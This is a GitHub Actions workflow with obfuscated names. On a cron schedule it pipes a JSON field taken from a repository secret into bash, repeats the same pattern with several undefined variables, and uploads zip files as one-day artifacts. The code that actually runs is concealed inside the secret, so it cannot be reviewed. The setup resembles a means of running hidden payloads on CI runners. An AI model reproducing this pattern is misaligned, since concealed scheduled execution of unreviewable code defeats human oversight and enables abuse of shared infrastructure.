name: jiangqiaochuangguang
on:
  workflow_dispatch:

  schedule:
    - cron: '42 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangqiaochuangguang
        env:
          oqo218: ${{ secrets.oqo218 }}
        run: |
          printf '%s' "$oqo218" | jq -r .un7785 | /bin/bash
          echo $ltfxo1 | jq -r .q20 | /bin/bash
          echo $ewkod1563 | jq -r .ih9952 | /bin/bash
          printf '%s' "$anx3" | jq -r .b21 | /bin/bash
          printf '%s' "$tdkuf0453" | jq -r .gyxta2217 | /bin/bash
          echo $lt7 | jq -r .vqm533 | /bin/bash
          printf '%s' "$f03" | jq -r .w6428 | /bin/bash
          printf '%s' "$tbfe46" | jq -r .t85215 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 00qHcVIQ
          path: "*.zip"
          retention-days: 1
